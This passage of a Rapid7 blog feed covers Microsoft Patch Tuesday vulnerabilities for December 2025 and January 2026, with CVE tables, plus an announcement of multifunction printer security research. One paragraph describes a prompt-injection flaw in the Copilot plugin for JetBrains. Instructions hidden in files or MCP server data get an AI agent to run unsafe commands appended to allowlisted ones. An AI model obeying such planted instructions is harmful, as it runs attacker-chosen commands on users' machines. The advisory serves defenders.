Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20853">CVE-2026-20853</a></td><td><p>Windows WalletService Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20870">CVE-2026-20870</a></td><td><p>Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><br/><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/em-patch-tuesday-january-2026</link>
      <guid isPermaLink="false">bltc2692fac087a77ba</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Wed, 14 Jan 2026 05:13:02 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9952397815d84355/6849acff3860836b5c360685/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[New Research: Multifunction Printer (MFP) Security Concerns within the Enterprise Business Environment]]></title>
      <description><![CDATA[<p>Multifunction printers (MFPs) do far more than print. They scan, email, fax, store, and authenticate. That convenience comes with risk. Our latest report, <a href="https://assets.contentstack.io/v3/assets/blte4f029e766e6b253/blt55f19b593b05481d/693abc2fb39bdbb323e35406/understanding-multifunction-printer-research-whitepaper.pdf" target="_self">Understanding Multifunction Printer (MFP) Security within the Enterprise Business Environment</a>, from Rapid7’s <a href="https://www.rapid7.com/blog/author/deral-heiland/" target="_self">Deral Heiland</a>, Principal Security Researcher (IoT), and <a href="https://www.rapid7.com/blog/author/sam-moses/" target="_self">Sam Moses</a>, Security Consultant, takes a clear look at where MFPs expand your attack surface and how to reduce that risk.</p><h2>Why this research matters</h2><p>MFPs are everywhere, often overlooked, and frequently underprotected. Many organizations deploy them without password changes, patch cycles, or network segmentation. Attackers notice. Because MFPs are attached to networks and can carry sensitive data, compromise can enable credential theft, data leakage, and lateral movement within the network. </p><p>The report tracks how long-standing and emerging weaknesses continue to affect MFP security. It highlights common risk areas such as weak authentication and limited patching practices, among others, that leave devices open to misuse or compromise. As these printers have grown more connected and feature-rich, the potential impact of a single vulnerable device has increased, especially when linked to core business systems or identity services.</p><p>The study also examines broader exposure trends across the enterprise landscape. Thousands of MFPs remain directly accessible from the internet, and vulnerability data shows that many models have faced serious flaws in recent years. Beyond technical issues, organizational processes like inconsistent patch management and poor decommissioning practices often allow sensitive data and credentials to linger on devices long after their use.</p><p>Penetration testing data collected by Rapid7 and Raxis confirms that these risks are not theoretical. Many organizations still deploy MFPs with default settings, leaving them open to credential theft and data access that can help attackers move deeper into the network.</p><p>The report introduces Praeda-II, a community tool designed for pentesters, auditors, and IT teams who need fast visibility into vulnerable printers, to identify risks in MFPs across modern models.</p><h2>See the research</h2><p>If your organization relies on networked printers, this research offers the insights you need. Read <a href="https://assets.contentstack.io/v3/assets/blte4f029e766e6b253/blt55f19b593b05481d/693aa3e9593811ca67692373/understanding-multifunciton-printer-research.pdf" target="_self">Understanding Multifunction Printer (MFP) Security within the Enterprise Business Environment</a> to learn about key risks and practical steps to strengthen your printer security program.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/ve-new-research-multifunction-printer-mfp-security-concerns-within-the-enterprise-business-environment</link>
      <guid isPermaLink="false">blt2f125b40ae895d1b</guid>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Deral Heiland]]></dc:creator>
      <pubDate>Thu, 11 Dec 2025 10:57:28 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf3ae6fb8e07d88e0/67ee88468d0b99031be0ea84/resources-research.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - December 2025]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is publishing a relatively light 54 new vulnerabilities this </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Dec"><span style='font-size: undefined;'>December 2025 Patch Tuesday</span></a><span style='font-size: undefined;'>, which is significantly lower than we have come to expect over the past couple of years. Today’s list includes two publicly disclosed remote code vulnerabilities, and a single exploited-in-the-wild vulnerability. Three critical remote code execution (RCE) vulnerabilities are also patched today; Microsoft currently assesses those as less likely or even unlikely to see exploitation. During December, Microsoft has already patched 14 browser vulnerabilities and more than 80 vulnerabilities in open source products, which are not included in the Patch Tuesday count above.</span></p><h2><span style='color:rgb(67, 67, 67);'>Windows Cloud Files minifilter: zero-day EoP</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft has evidence that attackers are already making full use of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-62221"><span style='font-size: undefined;'>CVE-2025-62221</span></a><span style='font-size: undefined;'>, a zero-day local elevation of privilege (EoP) vulnerability in the Windows Cloud Files Mini Filter Driver leading to SYSTEM privileges. File system filter drivers, aka </span><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/about-file-system-filter-drivers"><span style='font-size: undefined;'>minifilters</span></a><span style='font-size: undefined;'>, attach to the system software stack, and intercept requests targeted at a file system, and extend or replace the functionality provided by the original target. Typical use cases include data encryption, automated backup, on-the-fly compression, and cloud storage.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The Cloud Files minifilter is used by OneDrive, Google Drive, iCloud, and others, although as a core Windows component, it would still be present on a system where none of those apps were installed. Microsoft ranks CVE-2025-62221 as important rather than critical, since an attacker would need to have an existing foothold on the target system, but since it’s already exploited in the wild and leads to SYSTEM privileges, all but the most optimistic blue team threat models will surely treat CVE-2025-62221 as a top priority for remediation.</span></p><h2><span style='color:rgb(67, 67, 67);'>PowerShell: zero-day RCE</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Under normal circumstances, PowerShell does a decent job of looking out for the unwary end user, and will wait for confirmation or even outright block unexpected attempts to run code from the internet that isn’t signed by a trusted publisher. Windows Mark-of-the-Web (MotW) functionality tracks files that were downloaded from the internet, but </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-54100"><span style='font-size: undefined;'>CVE-2025-54100</span></a><span style='font-size: undefined;'> is a zero-day vulnerability which allows attackers to sidestep security controls that rely on MotW by the simple expedient of relying on code execution before the file is ever written. Microsoft is aware of public disclosure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The Windows security updates published today address CVE-2025-54100 by </span><a href="https://support.microsoft.com/en-us/topic/powershell-5-1-preventing-script-execution-from-web-content-7cb95559-655e-43fd-a8bd-ceef2406b705"><span style='font-size: undefined;'>altering the default functionality of Invoke-WebRequest in PowerShell 5.1</span></a><span style='font-size: undefined;'> so that it will prompt the user, instead of simply executing potentially malicious code as it processes the full Document Object Model of the requested remote resource. Scripts that rely on the impacted functionality may hang indefinitely when encountering the new prompt, unless updated to pass the -UseBasicParsing parameter to Invoke-WebRequest, since this explicitly avoids the potential for script execution. PowerShell 7 avoids all of this by moving beyond dependency on the legacy MSHTML/Trident engine, which used to power Internet Explorer. However, PowerShell 5.1 is what’s installed by default with a fresh Windows installation, even for Server 2025 and Windows 11 25H2, because Microsoft has a hard time telling enterprise customers that continuing support for legacy business applications comes with an ever-increasing security cost.</span></p><h2><span style='color:rgb(67, 67, 67);'>Copilot: zero-day</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><a href="https://plugins.jetbrains.com/plugin/17718-github-copilot--your-ai-pair-programmer"><span style='font-size: undefined;'>GitHub Copilot for Jetbrains</span></a><span style='font-size: undefined;'> plugin promises users that they can take control of their code using Copilot Edit Mode. Unfortunately, an attacker exploiting </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-64671"><span style='font-size: undefined;'>CVE-2025-64671</span></a><span style='font-size: undefined;'> will be aiming to do something very similar. Microsoft is aware of public disclosure. In this scenario, cross-prompt injection, where an attacker hides malicious instructions inside a malicious file or within MCP server data, can lead to arbitrary command execution, where unsafe commands sneak past security boundaries while appended to safe, allowlisted commands. This issue is by no means specific to Copilot or Jetbrains; </span><a href="https://maccarita.com/posts/idesaster/"><span style='font-size: undefined;'>as the original researcher points out</span></a><span style='font-size: undefined;'>, this is an example of an entire class of vulnerabilities, where the addition of agentic AI to an IDE extends and alters the attack surface. Other well-known IDE vendors have assigned CVEs and/or published patches for broadly similar issues.</span></p><h2><span style='color:rgb(67, 67, 67);'>Office: two critical no-click RCEs</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Office is widely deployed, and it’s a rare Patch Tuesday when it doesn’t receive at least a few security updates. Two Office RCEs are particularly noteworthy this month. The advisory FAQs for both </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-62554"><span style='font-size: undefined;'>CVE-2025-62554</span></a><span style='font-size: undefined;'> and </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-62557"><span style='font-size: undefined;'>CVE-2025-62557</span></a><span style='font-size: undefined;'> mention that the Preview Pane is a vector, so a user who scrolls past a malicious email in Outlook or a sketchy file in Explorer could trigger exploitation without doing anything obviously wrong. However, it gets worse, because even receiving a specially-crafted email could trigger exploitation, without any requirement that the user open, read, or click on the malicious link within it. </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-23397"><span style='font-size: undefined;'>CVE-2023-23397</span></a><span style='font-size: undefined;'>, a widely-discussed critical Outlook vulnerability from some two-and-a-half years ago </span><a href="https://www.rapid7.com/blog/post/2023/03/14/patch-tuesday-march-2023/"><span style='font-size: undefined;'>shares these characteristics</span></a><span style='font-size: undefined;'>. In that case, Microsoft detected in-the-wild exploitation by a Russia-based threat actor targeting government, military, and critical infrastructure targets in Europe. While there’s no suggestion that either of the vulnerabilities patched today necessarily result in NTLM hash disclosure in the same vein as CVE-2023-23397, the potential for exploitation without the need for any user interaction is a serious concern.</span></p><h2><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>There are no significant Microsoft product lifecycle changes this month. Visual Studio 2022 LTSC 17.10 will reach end of life in January.</span></p><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'></span></p><h2>Summary charts</h2><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltef747a8bd25af829/6939285b8f6e74320e96598d/2025-12-vuln_count_component.png" height="540" alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Dec" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Dec" width="1064" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltef747a8bd25af829/6939285b8f6e74320e96598d/2025-12-vuln_count_component.png" data-sys-asset-uid="bltef747a8bd25af829" data-sys-asset-filename="2025-12-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Dec" data-sys-asset-position="none" sys-style-type="display"/></figure><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2e0c5147e7876671/6939285bb5ddb93e0ac24450/2025-12-vuln_count_impact.png" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Dec" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Dec" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2e0c5147e7876671/6939285bb5ddb93e0ac24450/2025-12-vuln_count_impact.png" data-sys-asset-uid="blt2e0c5147e7876671" data-sys-asset-filename="2025-12-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Dec" data-sys-asset-position="none" sys-style-type="display"/></figure><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb08059a62d915a3f/6939285b8076db7e627f65b2/2025-12-vuln_count_impact-component-heatmap.png" alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2025-Dec" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2025-Dec" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb08059a62d915a3f/6939285b8076db7e627f65b2/2025-12-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="bltb08059a62d915a3f" data-sys-asset-filename="2025-12-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2025-Dec" data-sys-asset-position="none" sys-style-type="display"/></figure><p></p><p></p><h2 style="direction: ltr;">Summary tables</h2><h3 style="direction: ltr;">Azure vulnerabilities</h3><table><colgroup data-width='1250'><col style="width:14.064914992272023%"/><col style="width:38.02163833075734%"/><col style="width:13.75579598145286%"/><col style="width:17.465224111282843%"/><col style="width:16.69242658423493%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62550"><span style='font-size: undefined;'>CVE-2025-62550</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Monitor Agent Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr></tbody></table><h3 style="direction: ltr;">Browser vulnerabilities</h3><table><colgroup data-width='1250'><col style="width:12.828438948995363%"/><col style="width:41.57650695517774%"/><col style="width:13.75579598145286%"/><col style="width:16.537867078825347%"/><col style="width:15.301391035548686%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62223"><span style='font-size: undefined;'>CVE-2025-62223</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Edge (Chromium-based) for Mac Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13721"><span style='font-size: undefined;'>CVE-2025-13721</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13721 Race in v8</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13720"><span style='font-size: undefined;'>CVE-2025-13720</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13720 Bad cast in Loader</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13640"><span style='font-size: undefined;'>CVE-2025-13640</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13640 Inappropriate implementation in Passwords</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13639"><span style='font-size: undefined;'>CVE-2025-13639</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13639 Inappropriate implementation in WebRTC</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13638"><span style='font-size: undefined;'>CVE-2025-13638</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13638 Use after free in Media Stream</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13637"><span style='font-size: undefined;'>CVE-2025-13637</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13637 Inappropriate implementation in Downloads</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13636"><span style='font-size: undefined;'>CVE-2025-13636</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13636 Inappropriate implementation in Split View</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13635"><span style='font-size: undefined;'>CVE-2025-13635</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13635 Inappropriate implementation in Downloads</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13634"><span style='font-size: undefined;'>CVE-2025-13634</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13634 Inappropriate implementation in Downloads</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13633"><span style='font-size: undefined;'>CVE-2025-13633</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13633 Use after free in Digital Credentials</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13632"><span style='font-size: undefined;'>CVE-2025-13632</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13632 Inappropriate implementation in DevTools</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13631"><span style='font-size: undefined;'>CVE-2025-13631</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13631 Inappropriate implementation in Google Updater</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13630"><span style='font-size: undefined;'>CVE-2025-13630</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-13630 Type Confusion in V8</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr></tbody></table><h3 style="direction: ltr;">Mariner vulnerabilities</h3><table><colgroup data-width='1250'><col style="width:12.364760432766616%"/><col style="width:42.65842349304482%"/><col style="width:13.75579598145286%"/><col style="width:16.228748068006183%"/><col style="width:14.99227202472952%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12819"><span style='font-size: undefined;'>CVE-2025-12819</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Untrusted search path in auth_query connection in PgBouncer</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59775"><span style='font-size: undefined;'>CVE-2025-59775</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Apache HTTP Server: NTLM Leakage on Windows through UNC SSRF</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-65082"><span style='font-size: undefined;'>CVE-2025-65082</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Apache HTTP Server: CGI environment variable override</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-66200"><span style='font-size: undefined;'>CVE-2025-66200</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Apache HTTP Server: mod_userdir+suexec bypass via AllowOverride FileInfo</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.4</span></p></td></tr></tbody></table><h3 style="direction: ltr;">Microsoft Office vulnerabilities</h3><table><colgroup data-width='1250'><col style="width:14.351851851851851%"/><col style="width:37.345679012345684%"/><col style="width:13.734567901234568%"/><col style="width:17.746913580246915%"/><col style="width:16.820987654320987%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64672"><span style='font-size: undefined;'>CVE-2025-64672</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Server Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62554"><span style='font-size: undefined;'>CVE-2025-62554</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Office Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62557"><span style='font-size: undefined;'>CVE-2025-62557</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Office Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62558"><span style='font-size: undefined;'>CVE-2025-62558</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Word Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62559"><span style='font-size: undefined;'>CVE-2025-62559</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Word Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62562"><span style='font-size: undefined;'>CVE-2025-62562</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Outlook Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62561"><span style='font-size: undefined;'>CVE-2025-62561</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62563"><span 